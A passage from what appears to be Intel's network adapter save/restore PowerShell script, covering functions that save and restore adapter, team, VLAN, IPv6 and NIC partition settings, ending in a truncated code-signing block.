-Property Name,Caption WriteTextToConfigFile "VlanSettingsStart" WriteTextToIPFile "VlanIPSettingsStart" # Check status of EnablDHCP for IP settings later $EnableDHCPCol = $colSettings | Where-Object {($_.Caption -eq "EnableDHCP")} | Select-Object $colProperty $EnableDHCPv6Col = $colSettings | Where-Object {($_.Caption -eq "EnableDHCPv6")} | Select-Object $colProperty $ManualIPv6Col = $colSettings | Where-Object {($_.Caption -eq "ManualIPv6")} | Select-Object $colProperty foreach ($Setting in $colSettings) { # Get the DHCP enable value for the specific adapter $EnableDHCP = $EnableDHCPCol | Where-Object {($_.Name -eq $Setting.Name)} # Get the DHCPv6 enable value, and the ManualIPv6 value # EnableDHCPv6 is 0 (disabled) only if the "Managed Address Configuration Flag" and the "Other Stateful Configuration Flag" are both 0 # (see https://blogs.technet.microsoft.com/teamdhcp/2009/03/03/dhcpv6-understanding-of-address-configuration-in-automatic-mode-and-installation-of-dhcpv6-server/) # ManualIPv6 is 1 (manual) only if the PrefixOrigin and SuffixOrigin of any IPv6 address are both "Manual" - other values indicate autoconfiguration $EnableDHCPv6 = $EnableDHCPv6Col | Where-Object {($_.Name -eq $Setting.Name)} $ManualIPv6 = $ManualIPv6Col | Where-Object {($_.Name -eq $Setting.Name)} $bSaveIPv6Settings = $false # if EnableDHCPv6 = 0 and ManualIPv6 = 1, we want to save IPv6 addresses and settings. Otherwise, all IPv6 addresses were autoconfigured and we don't need to save/restore them if ($EnableDHCPv6.CurrentValue -eq 0 -and $ManualIPv6.CurrentValue -eq 1) { $bSaveIPv6Settings = $true } # Save the IP Settings in the IP config file $bIPSetting = SaveIPSetting $Setting "Vlan" $EnableDHCP.CurrentValue $bSaveIPv6Settings if ($bIPSetting -eq $false) { WriteObjectToConfigFile $Setting $colProperty } } WriteTextToConfigFile "VlanSettingsEnd" WriteTextToConfigFile "" WriteTextToIPFile "VlanIPSettingsEnd" WriteTextToIPFile "" } #Save NICPART settings Function SaveNICPARTSettings { Write-Log $MyInvocation.MyCommand $colProperty = "Name","PartitionNumber","Identifier","MinBWPercent","MaxBWPercent" WriteTextToConfigFile "NICPARTSettingsStart" #start lock BeginApply try { #Get the partition information for all partitions on system and save them $PartitionArray = InvokeMethod $Script:service GetPartitionsForPort "szDeviceID" $null WriteObjectToConfigFile $PartitionArray.Partitions $colProperty } catch { Write-log "Unable to Save NIC Partition Settings" } #release lock ReleaseLock WriteTextToConfigFile "NICPARTSettingsEnd" WriteTextToConfigFile "" } #Remove teams and vlans on system Function RemoveTeamsAndVlans { Write-Log $MyInvocation.MyCommand $IANetObjs = @('IANet_TeamOfAdapters','IANet_Vlan') foreach ($IANetObj in $IANetObjs) { $colDevices = @() $colDevices += GetObject $IANetObj BeginApply foreach ($Device in $colDevices) { try { DeleteObject $Device } catch { Write-Log "Unable to DeleteObject `$Device $Device" } } ReleaseLock } } # Check that adapters in configuration file are present and enabled on the system. Function CheckAdaptersExist { Write-Log $MyInvocation.MyCommand $Script:colImportAdapters = ReadFromConfigFile "Adapters" if ($null -ne $Script:colImportAdapters ) { foreach ($Adapter in $Script:colImportAdapters) { # Find the matching file adapter using the appropriate property to compare name,address or ID if ($Script:BDF -eq $false) { if ($bUpRestore -eq $true) { $ImportedAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.PermanentAddress -eq $Adapter.PermanentAddress)} } else { $ImportedAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.PCIDeviceID -eq $Adapter.PCIDeviceID)} } if ($null -eq $ImportedAdapter) { $ImportedAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.Name -eq $Adapter.Name)} } } else { $ImportedAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.SlotID -eq $Adapter.SlotID)} } if ($null -eq $ImportedAdapter) { Write-Warning UnableToFindDevice Write-Log "Invalid `$Adapter = $Adapter" } } } } # Restore custome OEM value Function RestoreOEMCustomizeableSetting { Write-Log $MyInvocation.MyCommand $ImportOEMSetting = ReadFromConfigFile "OEMSetting" if ($null -ne $ImportOEMSetting) { Write-Host $Messages.SettingOEMValue Set-ItemProperty -Path HKLM:\SOFTWARE\Intel\Network_Services\NCS2 -Name OEMCustomizeable -Value $ImportOEMSetting.OEMCustomizeable -Type DWord } } Function RestoreSettings($Setting, $stringClass, $enumClass) { if ($Setting) { # IPv6 Address and DefaultGateway must be set with netsh, currently no API to set setting in Middleware if ($Setting.Caption -eq "IPv6Address") { # netsh interface ipv6 add address $ConnectionName $Address $ConnectionName = Get-WmiObject $stringClass -Namespace "root/intelncs2" | Where-Object {($_.Name -eq $Setting.Name) -and ($_.Caption -eq "ConnectionName")} | Select-Object -ExpandProperty CurrentValue $ConnectionInterfaceIndex = Get-WmiObject Win32_NetworkAdapter -Namespace "root/cimv2" | Where-Object {($_.NetConnectionID -eq $ConnectionName)} | Select-Object -ExpandProperty InterfaceIndex # delete current IPv6 addresses to overwrite them with saved config, if there are no addresses then we catch the exception and continue since there is nothing to delete. try { $AllAddresses = Get-WmiObject Win32_NetworkAdapterConfiguration -Namespace "root/cimv2" | Where-Object {($_.InterfaceIndex -eq $ConnectionInterfaceIndex)} | Select-Object -ExpandProperty IPAddress -ErrorAction SilentlyContinue } catch { Write-Log "No IPv6Address found." } $IPv6Array = @() foreach ($Address in $AllAddresses) { if (-not $Address.Contains(".")) { $IPv6Array += $Address } } #wrap interfaceindex in quotes for netsh $ConnectionInterfaceIndex = "`"$($ConnectionInterfaceIndex)`"" foreach ($IP in $IPv6Array) { $DeleteCommand = "netsh interface ipv6 delete address $ConnectionInterfaceIndex $IP" Invoke-Expression $DeleteCommand } foreach ($Value in $Setting.CurrentValues) #CurrentValues is a list of IPv6Addresses split by comma, set each address { $Command = "netsh interface ipv6 add address $ConnectionInterfaceIndex $Value" Invoke-Expression $Command } } elseif ($Setting.Caption -eq "DefaultGatewayIPv6") { # netsh interface ipv6 add route ::/0 $ConnectionName $Address $ConnectionName = Get-WmiObject $stringClass -Namespace "root/intelncs2" | Where-Object {($_.Name -eq $Setting.Name) -and ($_.Caption -eq "ConnectionName")} | Select-Object -ExpandProperty CurrentValue $ConnectionInterfaceIndex = Get-WmiObject Win32_NetworkAdapter -Namespace "root/cimv2" | Where-Object {($_.NetConnectionID -eq $ConnectionName)} | Select-Object -ExpandProperty InterfaceIndex # delete current IPv6 gateways to overwrite them with saved config, if there are no gateways then we catch the exception and continue since there is nothing to delete. try { $AllGateways = Get-WmiObject Win32_NetworkAdapterConfiguration -Namespace "root/cimv2" | Where-Object {($_.InterfaceIndex -eq $ConnectionInterfaceIndex)} | Select-Object -ExpandProperty DefaultIPGateway -ErrorAction SilentlyContinue } catch { Write-Log "No DefaultGatewayIPv6 found." } $IPv6Array = @() foreach ($Address in $AllGateways) { if (-not $Address.Contains(".")) { $IPv6Array += $Address } } #wrap interfaceindex in quotes for netsh $ConnectionInterfaceIndex = "`"$($ConnectionInterfaceIndex)`"" foreach ($IP in $IPv6Array) { $DeleteCommand = "netsh interface ipv6 delete route ::/0 $ConnectionInterfaceIndex $IP" Invoke-Expression $DeleteCommand } foreach ($Value in $Setting.CurrentValues) { $Command = "netsh interface ipv6 add route ::/0 $ConnectionInterfaceIndex $Value" Invoke-Expression $Command } } elseif ($Setting.Caption -eq "EnableDHCPv6") { $EnableDHCPv6Setting = Get-WmiObject $enumClass -Namespace "root/intelncs2" | Where-Object {($_.Name -eq $Setting.Name) -and ($_.Caption -eq "EnableDHCPv6")} | Select-Object -ExpandProperty CurrentValue if (($Setting.CurrentValue -eq "0") -and ($EnableDHCPv6Setting.CurrentValue -eq "1")) { $ConnectionName = Get-WmiObject $stringClass -Namespace "root/intelncs2" | Where-Object {($_.Name -eq $Setting.Name) -and ($_.Caption -eq "ConnectionName")} | Select-Object -ExpandProperty CurrentValue $ConnectionInterfaceIndex = Get-WmiObject Win32_NetworkAdapter -Namespace "root/cimv2" | Where-Object {($_.NetConnectionID -eq $ConnectionName)} | Select-Object -ExpandProperty InterfaceIndex $ConnectionInterfaceIndex = "`"$($ConnectionInterfaceIndex)`"" $dhcpv6routercmd = "netsh int ipv6 set int $ConnectionInterfaceIndex routerdiscovery=disabled managedaddress=disabled otherstateful=disabled" Invoke-Expression $dhcpv6routercmd Start-Sleep -s 1 } elseif (($Setting.CurrentValue -eq "1") -and ($EnableDHCPv6Setting.CurrentValue -eq "0")) { $ConnectionName = Get-WmiObject $stringClass -Namespace "root/intelncs2" | Where-Object {($_.Name -eq $Setting.Name) -and ($_.Caption -eq "ConnectionName")} | Select-Object -ExpandProperty CurrentValue $ConnectionInterfaceIndex = Get-WmiObject Win32_NetworkAdapter -Namespace "root/cimv2" | Where-Object {($_.NetConnectionID -eq $ConnectionName)} | Select-Object -ExpandProperty InterfaceIndex $ConnectionInterfaceIndex = "`"$($ConnectionInterfaceIndex)`"" $dhcpv6managedcmd = "netsh int ipv6 set int $ConnectionInterfaceIndex managedaddress=enabled" Invoke-Expression $dhcpv6managedcmd Start-Sleep -s 1 } } else { $result = SetSetting $Setting Write-Log "SetSetting $result" } } } # Restore adapter settings Function RestoreAdapterSettings($colImportedSettings) { Write-Log $($MyInvocation.MyCommand) Write-Log "`$colImportedSettings = $colImportedSettings" # Get adapter settings on system $colSetting = GetObject "IANet_AdapterSetting" | Sort-Object -Property Name,Caption # Add parent identifiers to settings on system foreach ($cSetting in $colSetting) { AddParentIDs $cSetting } # start lock BeginApply # Loop through the passed in settings from the config file foreach ($ImportedSetting in $colImportedSettings) #for each setting in AdapterIPSettings { try { # Find the matching system setting using the appropriate property to compare name,address or ID if ($Script:BDF -eq $false) { # finds the setting with the same caption and device name if (($bUpRestore -eq $true)) { $Setting = $colSetting | Where-Object {($_.PermanentAddress -eq $ImportedSetting.PermanentAddress) -and ($_.Caption -eq $ImportedSetting.Caption)} } else { $Setting = $colSetting | Where-Object {($_.PCIDeviceID -eq $ImportedSetting.PCIDeviceID) -and ($_.Caption -eq $ImportedSetting.Caption)} } if ($null -eq $Setting) { $Setting = $colSetting | Where-Object {($_.Name -eq $ImportedSetting.Name) -and ($_.Caption -eq $ImportedSetting.Caption)} } } else { $Setting = $colSetting | Where-Object {($_.SlotID -eq $ImportedSetting.SlotID) -and ($_.Caption -eq $ImportedSetting.Caption)} } # If the setting in the file can't be found on the system, continue to the next setting if ($null -eq $Setting) { Write-Log "Not Restored: $ImportedSetting" continue } # See if 'CurrentValues' is a property over the system setting, if so set that value from the config file setting if (($Setting.Properties | Select-Object -ExpandProperty Name) -contains "CurrentValues") { # If no value was present from the file setting, then set it to empty if ($null -eq $ImportedSetting.CurrentValues) { $Setting.CurrentValues = {} } else { $Setting.CurrentValues = $ImportedSetting.CurrentValues.Split(",") } } else { $Setting.CurrentValue = $ImportedSetting.CurrentValue } RestoreSettings $Setting "IANet_AdapterSettingString" "IANet_AdapterSettingEnum" } catch { $ErrorMessagePart1 = [string]$Messages.UnableToSetPart1 $ErrorMessagePart2 = [string]$Messages.UnableToSetPart2 # Unable to set ... on ... Write-Log "$ErrorMessagePart1 $($Setting.Caption) $ErrorMessagePart2 $($Setting.Name)" } } ReleaseLock } # Set the primary and secondary adapters on the team Function RestorePrimaryAndSecondary($Team) { Write-Log $MyInvocation.MyCommand Write-Log "`$Team = $Team" Write-Host $Messages.RestoringTeamAdapters $Team.TeamName # Find the adapter objects from the configuration file that match the team primary and secondary adapter names $PrimaryImportAdapter = $Script:colImportAdapters | Where-Object {$_.OriginalDisplayName -eq $Team.PrimaryAdapter} $SecondaryImportAdapter = $Script:colImportAdapters | Where-Object {$_.OriginalDisplayName -eq $Team.SecondaryAdapter} # Find the matching system adapter using the appropriate property to compare name,address or ID if ($Script:BDF -eq $false) { if ($bUpRestore) { $PrimaryAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.PermanentAddress -eq $PrimaryImportAdapter.PermanentAddress)} } else { $PrimaryAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.PCIDeviceID -eq $PrimaryImportAdapter.PCIDeviceID)} } } else { $PrimaryAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.SlotID -eq $PrimaryImportAdapter.SlotID)} } if ($Script:BDF -eq $false) { if ($bUpRestore -eq $true) { $SecondaryAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.PermanentAddress -eq $SecondaryImportAdapter.PermanentAddress)} } else { $SecondaryAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.PCIDeviceID -eq $SecondaryImportAdapter.PCIDeviceID)} } } else { $SecondaryAdapter = $Script:EnabledSystemAdapters | Where-Object {($_.SlotID -eq $SecondaryImportAdapter.SlotID)} } # Set the primary and secondary adapters on the team $Team = GetObject "IANet_TeamOfAdapters" | Where-Object {$_.TeamName -eq $Team.TeamName} | Sort-Object -Property TeamName $param = $Team.psbase.GetMethodParameters("ValidateAndSetAdapterPriority") $param.PrimaryAdapter = $PrimaryAdapter $param.SecondaryAdapter = $SecondaryAdapter $param.SetValuesOnNoError = 2 $value = $Team.psbase.InvokeMethod("ValidateAndSetAdapterPriority", $param, $invokeoptions) Write-Log $Value } # Restore teams from configuration file Function RestoreTeams { Write-Log $MyInvocation.MyCommand # Get the team objects from the configuration file $colImportTeams = ReadFromConfigFile "Teams" if ($null -ne $colImportTeams) { BeginApply foreach ($Team in $colImportTeams) { Write-Host $Messages.Restoring $Team.TeamName try { # Create a new team object $classdef = NewObject root\intelncs2:IANet_TeamOfAdapters # fill in the CreateTeam's method parameters with the new object $param = $classdef.psbase.GetMethodParameters("CreateTeam2Ex") $TeamedAdapters = $Team.TeamMembers.split("|") $param.Adapters = @() $bCreateTeam = $true # Set the teammembers for creation foreach ($Adapter in $TeamedAdapters) { $Adapter = $Adapter.Split(",") $AdapterName = $Adapter[0] $AdapterPermanentAddress = $Adapter[1] $AdapterPCIDeviceID = $Adapter[2] $AdapterSlotID = $Adapter[3] $Adapter = $null # Find the matching system adapter using the appropriate property to compare address or ID if ($Script:BDF -eq $false) { if ($bUpRestore -eq $true) { $Adapter = $Script:EnabledSystemAdapters | Where-Object {($_.PermanentAddress -eq $AdapterPermanentAddress)} } else { $Adapter = $Script:EnabledSystemAdapters | Where-Object {($_.PCIDeviceID -eq $AdapterPCIDeviceID)} } # Older versions of SaveRestore.ps1 won't have the Adapter's PermanentAddress, PCIDeviceID, or SlotID saved, so use the name. if ($null -eq $Adapter) { $Adapter = $Script:EnabledSystemAdapters | Where-Object {($_.Name -eq $AdapterName)} } } else { $Adapter = $Script:EnabledSystemAdapters | Where-Object {($_.SlotID -eq $AdapterSlotID)} } # If a teammember can't be found output an error and breakout of team creation if ($null -eq $Adapter) { Write-Warning UnableToFindDevice Write-Log $AdapterName $bCreateTeam = $false break } $param.Adapters += $Adapter } # If an error was found, don't try and create the team if ($bCreateTeam -eq $false) { Continue } $param.TeamMode = $Team.TeamMode $param.TeamName = $Team.TeamName # the invoke options $invokeoptions = New-Object System.Management.InvokeMethodOptions $invokeoptions.Context = $Script:context # call the CreateTeam method to create the new team $null = $classdef.psbase.InvokeMethod("CreateTeam2Ex", $param, $invokeoptions) # Set primary and secondary adapters RestorePrimaryAndSecondary $Team } catch { Write-Log "Unable to Restore Teams" } } ReleaseLock } } #Restore team settings Function RestoreTeamSettings($colImportSettings) { Write-Log $MyInvocation.MyCommand Write-Log "`$colImportSettings = $colImportSettings" # Get the current team settings $colSetting = GetObject "IANet_TeamSetting" | Sort-Object -Property Name,Caption BeginApply foreach ($Setting in $colSetting) { try { # If the current setting using 'CurrentValues' then set that value. if (($Setting.Properties | Select-Object -ExpandProperty Name) -contains "CurrentValues") { $ValueObject = $colImportSettings | Where-Object {($_.TeamName -eq $Setting.Name) -and ($_.Caption -eq $Setting.Caption)} | Select-Object CurrentValues if ($null -eq $ValueObject.CurrentValues) { $Setting.CurrentValues = {} } else { $Setting.CurrentValues = $ValueObject.CurrentValues.Split(",") } } else { $ValueObject = $colImportSettings | Where-Object {($_.TeamName -eq $Setting.Name) -and ($_.Caption -eq $Setting.Caption)} | Select-Object CurrentValue $Setting.CurrentValue = $ValueObject.CurrentValue } #If a matching system setting was found set it to the restore value if($null -ne $ValueObject) { RestoreSettings $Setting "IANet_TeamSettingString" "IANet_TeamSettingEnum" } } catch { $ErrorMessagePart1 = [string]$Messages.UnableToSetPart1 $ErrorMessagePart2 = [string]$Messages.UnableToSetPart2 # Unable to set ... on ... Write-Log "$ErrorMessagePart1 $($Setting.Caption) $ErrorMessagePart2 $($Setting.Name)" } } ReleaseLock } Function RestoreVlans { Write-Log $MyInvocation.MyCommand # Get vlan objects from config file $colImportVlans = ReadFromConfigFile "Vlans" if ($null -ne $colImportVlans) { foreach ($Vlan in $colImportVlans) { # Start lock BeginApply try { # Find the matching system adapter using the appropriate property to compare name,address or ID if ($Script:BDF -eq $false) { if ($bUpRestore -eq $true) { $Adapter = $Script:Adapters | Where-Object {($_.PermanentAddress -eq $Vlan.ParentPermanentAddress)} } else { $Adapter = $Script:Adapters | Where-Object {($_.PCIDeviceID -eq $Vlan.ParentPCIDeviceID)} } # Older versions of SaveRestore.ps1 won't have the Adapter's PermanentAddress, PCIDeviceID, or SlotID saved, so use the name. if ($null -eq $Adapter) { $Adapter = $Script:Adapters | Where-Object {($_.Name -eq $Vlan.ParentName)} } } else { $Adapter = $Script:Adapters | Where-Object {($_.SlotID -eq $Vlan.ParentSlotID)} } if ($null -ne $Adapter) { # Get the vlan creation class associated with adapter parent object $VlanCreator = GetAssociated $Adapter.path.path "ResultClass = IANet_802dot1QVLANService" | Where-Object {1} } # Check if vlan needs to be created on a team else { # Get the logical ethernet adapter object for the team parent $Team = GetObject "IANet_LogicalEthernetAdapter" | Where-Object {( NScompare $_.Name $Vlan.ParentName )} if ($null -ne $Team) { # Get the vlan creation class associated with team parent object $VlanCreator = GetAssociated $Team.path.path "ResultClass = IANet_802dot1QVLANService" | Where-Object {1} } } # If the vlan creation class was found continue on to create the vlan if ($null -ne $VlanCreator) { Write-Host $Messages.Restoring $Vlan.VlanName # fill in the CreateVlan's method parameters $param = $VlanCreator.psbase.GetMethodParameters("CreateVlan") $param.Name = $Vlan.VLANNAME $param.VLANNumber = $Vlan.VLANID # the invoke options $invokeoptions = New-Object System.Management.InvokeMethodOptions $invokeoptions.Context = $Script:context # call the CreateVlan method to create the new vlan $null = $VlanCreator.psbase.InvokeMethod("CreateVlan", $param, $invokeoptions) } } catch { Write-Log "Unable to Restore VLANs" } ReleaseLock } } } # Restore vlan settings Function RestoreVlanSettings($colImportSettings) { Write-Log $MyInvocation.MyCommand Write-Log "`$colImportSettings = $colImportSettings" # Get the current Vlan settings $vlanSettings = GetObject "IANet_VLANSetting" | Sort-Object -Property ParentName,VLANID,Caption # Start lock BeginApply foreach ($Setting in $vlanSettings) { try { if ($Script:BDF -eq $false) { #finds the setting with the same caption and device name if ($bUpRestore -eq $true) { $ValueObject = $colImportSettings | Where-Object {($_.ParentPermanentAddress -eq $Setting.ParentPermanentAddress) -and ($_.Caption -eq $Setting.Caption) -and ($_.VLANID -eq $Setting.VLANID)} } else { $ValueObject = $colImportSettings | Where-Object {($_.ParentPCIDeviceID -eq $Setting.ParentPCIDeviceID) -and ($_.Caption -eq $Setting.Caption) -and ($_.VLANID -eq $Setting.VLANID)} } # Older versions of SaveRestore.ps1 won't have the Adapter's PermanentAddress, PCIDeviceID, or SlotID saved, so use the name. if ($null -eq $ValueObject) { $ValueObject = $colImportSettings | Where-Object {( NSCompare $_.ParentName $Setting.ParentName ) -and ( $_.Caption -eq $Setting.Caption) -and ($_.VLANID -eq $Setting.VLANID)} } } else { $ValueObject = $colImportSettings | Where-Object {($_.ParentSlotID -eq $Setting.ParentSlotID) -and ($_.Caption -eq $Setting.Caption) -and ($_.VLANID -eq $Setting.VLANID)} } if (($Setting.Properties | Select-Object -ExpandProperty Name) -contains "CurrentValues") { if ($null -eq $ValueObject.CurrentValues) { $Setting.CurrentValues = {} } else { $Setting.CurrentValues = $ValueObject.CurrentValues.Split(",") } } else { $Setting.CurrentValue = $ValueObject.CurrentValue } # If a matching system setting was found set it to the restore value if($null -ne $ValueObject) { RestoreSettings $Setting "IANet_VLANSettingString" "IANet_VLANSettingEnum" } } catch { $ErrorMessagePart1 = [string]$Messages.UnableToSetPart1 $ErrorMessagePart2 = [string]$Messages.UnableToSetPart2 # Unable to set ... on ... Write-Log "$ErrorMessagePart1 $($Setting.Caption) $ErrorMessagePart2 $($Setting.Name)" } } ReleaseLock } # Restore the IP settings from the IP config file Function RestoreIPSettings { Write-Log $MyInvocation.MyCommand # Restore Adapter IP settings from the IP config file $colImportSettings = ReadFromIPFile "AdapterIPSettings" if ($null -ne $colImportSettings) { foreach ($setting in $colImportSettings) { # If the staticip is set on a disconnected adapter from cmdline tools (netsh, New-NetIPAddress, Set-NetIPInterface, etc) # the private 169.254.x.x IP that Microsoft assigns when it can't get an address from the DHCP server # comes along and saverestore ends up restoring that IP with a 255.255.0.0 subnetmask instead. # Only capture the first ip, which is what static ip and subnetmask the user intended to set # ignore the 169.254.x.x IP and 255.255.0.0 subnetmask if (($setting.Caption -eq 'IPv4Address') -or ($setting.Caption -eq 'SubnetMask')) { if (($setting.CurrentValues.ToCharArray()) -contains [char]',') { $setting.CurrentValues = $setting.CurrentValues.Substring(0, $setting.CurrentValues.lastIndexOf(',')) } } } Write-Host $Messages.RestoringAdapterIP RestoreAdapterSettings $colImportSettings } if ($Script:bANSInstalled) { # Restore Team IP settings from the IP config file $colImportSettings = ReadFromIPFile "TeamIPSettings" if ($null -ne $colImportSettings) { Write-Host $Messages.RestoringTeamIP RestoreTeamSettings $colImportSettings $colSetting } # Restore Vlan IP settings from the IP config file $colImportSettings = ReadFromIPFile "VlanIPSettings" if ($null -ne $colImportSettings) { Write-Host $Messages.RestoringVLANIP RestoreVlanSettings $colImportSettings } } } # Restore devices and settings from configuration files Function RestoreAdvancedSettingsAndDevices { Write-Log $MyInvocation.MyCommand #Restore Adapter avanced settings from config file $colImportSettings = ReadFromConfigFile "AdapterSettings" if ($null -ne $colImportSettings) { Write-Host $Messages.RestoringAdapterSettings RestoreAdapterSettings $colImportSettings } if (!$Script:bANSInstalled) { Write-Warning UnableToFindANS } else { #Restore Teams RestoreTeams #Restore Team advanced settings from config file $colImportSettings = ReadFromConfigFile "TeamSettings" if ($null -ne $colImportSettings) { Write-Host $Messages.RestoringTeamSettings RestoreTeamSettings $colImportSettings } #Restore Vlans RestoreVlans #Restore Vlan avanced settings from config file $colImportSettings = ReadFromConfigFile "VlanSettings" if ($null -ne $colImportSettings) { Write-Host $Messages.RestoringVLANSettings RestoreVlanSettings $colImportSettings } } if (Test-Path $Script:ScriptPath\Saved_StaticIP.txt) { #Restore IP Settings from IP config file RestoreIPSettings } } #Restore NICPART settings Function RestoreNICPARTSettings { Write-Log $MyInvocation.MyCommand #Restore NICPART settings from config file $colImportPartitions = ReadFromConfigFile "NICPARTSettings" Write-Host $Messages.RestoringAdapterPartition BeginApply try { if ($null -ne $colImportPartitions) { #Get the partition information for all partitions on system and save them $PartitionObject = InvokeMethod $Script:service GetPartitionsForPort "szDeviceID" $null $PartitionArray = $PartitionObject.Partitions foreach ($Partition in $PartitionArray) { $ImportPartition = $colImportPartitions | Where-Object {($_.PartitionNumber -eq $Partition.PartitionNumber) -and ($_.Identifier -eq $Partition.Identifier)} if ($null -ne $ImportPartition) { if ($Script:BDF -eq $true) { $Partition.Name = "IGNORE" $Partition.DeviceGuid = "IGNORE" } else { $Partition.Identifier = "IGNORE" $Partition.DeviceGuid = "IGNORE" } $Partition.MinBWPercent = $ImportPartition.MinBWPercent $Partition.MaxBWPercent = $ImportPartition.MaxBWPercent } } $Output = InvokeMethod $Script:service ValidateAndSetBAndwidthsForPort "Partitions","SetValuesOnNoError" $PartitionArray,"1" } } catch { Write-Log "Unable to Restore NIC Partition Settings" } ReleaseLock } <# .SYNOPSIS Make sure users know about BDF parameter when using NICPART enabled adapters .DESCRIPTION By default, the save restore script uses the adapter's friendly name to match the name of the adapter in the configuration file to adapter in the system. Because of the way Windows enumerates devices and assigns friendly names, the name of the adapter saved in the configuration file may not be the exact same adapter/port/partition on another system. The /bdf command line option should be used when restoring settings of NICPART enabled devices on multiple systems. .NOTES This must be invoked after GetAdaptersOnSystem - as it relies on the contents of $Script:Adapters. The global variable is used to save time when restoring settings on user systems (to avoid polling the system again just to get the same data). #> function CheckNICPART_BDFWarning { Write-Log $MyInvocation.MyCommand $NICPART = $Script:Adapters | Where-Object {($_.Capabilities -eq 76)} if ($NICPART -and $Script:BDF -eq $false) { Write-Host $Messages.NICPartitioningDetected } } <# .SYNOPSIS "No Space Compare" Compares two strings without whitespace .DESCRIPTION Intel(R) Network Connections Software recently introduced a change to ANS team prefixes. The old format was "TEAM : ". The new format is "TEAM: ". To preserve user configurations during an upgrade it is necessary to compare some devices without space differences. #> function NSCompare ($s1, $s2) { Write-Log $MyInvocation.MyCommand Write-Log "Comparing `$s1=$s1 and `$s2=$s2..." $s1temp = $s1 -replace '\s', '' $s2temp = $s2 -replace '\s', '' return ($s1temp -eq $s2temp) } #-----------------------------------------------------[Execution]------------------------------------------------------ # Determine which action was specified by the user switch($Script:Action) { "Save" {$Script:bSave=$true Write-Host $Messages.PerformingSave break} "UpSave" {$Script:bUpSave=$true Write-Host $Messages.PerformingUpgradeSave break} "Restore" {$Script:bRestore=$true Write-Host $Messages.PerformingRestore break} "UpRestore" {$Script:bUpRestore=$true Write-Host $Messages.PerformingUpgradeRestore break} "Remove" {$Script:bRemove=$true Write-Host $Messages.PerformingRemove break} "?" {PrintUsage} "help"{PrintUsage} default {PrintUsage} } CheckForAdminRights CheckForDMiXInstall CheckForANSInstall # Setup the save/restore path SetupSaveRestoreLocation # If a save is the primary action if (($Script:bSave -eq $true) -or ($Script:bUpSave -eq $true)) { GetAdaptersOnSystem RemoveOldFiles SaveAdapters SaveOEMCustomizeableSetting SaveAdapterSettings if ($Script:bANSInstalled) { SaveTeams SaveTeamSettings SaveVlans SaveVlanSettings } SaveNICPARTSettings } # If a restore is the primary action elseif (($Script:bRestore -eq $true) -or ($Script:bUpRestore -eq $true)) { CheckIfConfigFileExists if ($Script:bANSInstalled) { RemoveTeamsAndVlans } GetAdaptersOnSystem CheckNICPART_BDFWarning CheckAdaptersExist RestoreOEMCustomizeableSetting RestoreAdvancedSettingsAndDevices RestoreNICPARTSettings } # If remove is the primary action elseif ($Script:bRemove -eq $true) { RemoveTeamsAndVlans } # SIG # Begin signature block # MIIocQYJKoZIhvcNAQcCoIIoYjCCKF4CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAg5XcJXSwWFqph # dupHD17uM3jd+S7JJX0NITYAtsMChqCCEfIwggVvMIIEV6ADAgECAhBI/JO0YFWU # jTanyYqJ1pQWMA0GCSqGSIb3DQEBDAUAMHsxCzAJBgNVBAYTAkdCMRswGQYDVQQI # DBJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcMB1NhbGZvcmQxGjAYBgNVBAoM # EUNvbW9kbyBDQSBMaW1pdGVkMSEwHwYDVQQDDBhBQUEgQ2VydGlmaWNhdGUgU2Vy # dmljZXMwHhcNMjEwNTI1MDAwMDAwWhcNMjgxMjMxMjM1OTU5WjBWMQswCQYDVQQG # EwJHQjEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMS0wKwYDVQQDEyRTZWN0aWdv # IFB1YmxpYyBDb2RlIFNpZ25pbmcgUm9vdCBSNDYwggIiMA0GCSqGSIb3DQEBAQUA # A4ICDwAwggIKAoICAQCN55QSIgQkdC7/FiMCkoq2rjaFrEfUI5ErPtx94jGgUW+s # hJHjUoq14pbe0IdjJImK/+8Skzt9u7aKvb0Ffyeba2XTpQxpsbxJOZrxbW6q5KCD # J9qaDStQ6Utbs7hkNqR+Sj2pcaths3OzPAsM79szV+W+NDfjlxtd/R8SPYIDdub7 # P2bSlDFp+m2zNKzBenjcklDyZMeqLQSrw2rq4C+np9xu1+j/2iGrQL+57g2extme # me/G3h+pDHazJyCh1rr9gOcB0u/rgimVcI3/uxXP/tEPNqIuTzKQdEZrRzUTdwUz # T2MuuC3hv2WnBGsY2HH6zAjybYmZELGt2z4s5KoYsMYHAXVn3m3pY2MeNn9pib6q # RT5uWl+PoVvLnTCGMOgDs0DGDQ84zWeoU4j6uDBl+m/H5x2xg3RpPqzEaDux5mcz # mrYI4IAFSEDu9oJkRqj1c7AGlfJsZZ+/VVscnFcax3hGfHCqlBuCF6yH6bbJDoEc # QNYWFyn8XJwYK+pF9e+91WdPKF4F7pBMeufG9ND8+s0+MkYTIDaKBOq3qgdGnA2T # OglmmVhcKaO5DKYwODzQRjY1fJy67sPV+Qp2+n4FG0DKkjXp1XrRtX8ArqmQqsV/ # AZwQsRb8zG4Y3G9i/qZQp7h7uJ0VP/4gDHXIIloTlRmQAOka1cKG8eOO7F/05QID # AQABo4IBEjCCAQ4wHwYDVR0jBBgwFoAUoBEKIz6W8Qfs4q8p74Klf9AwpLQwHQYD # VR0OBBYEFDLrkpr/NZZILyhAQnAgNpFcF4XmMA4GA1UdDwEB/wQEAwIBhjAPBgNV # HRMBAf8EBTADAQH/MBMGA1UdJQQMMAoGCCsGAQUFBwMDMBsGA1UdIAQUMBIwBgYE # VR0gADAIBgZngQwBBAEwQwYDVR0fBDwwOjA4oDagNIYyaHR0cDovL2NybC5jb21v # ZG9jYS5jb20vQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNAYIKwYBBQUHAQEE # 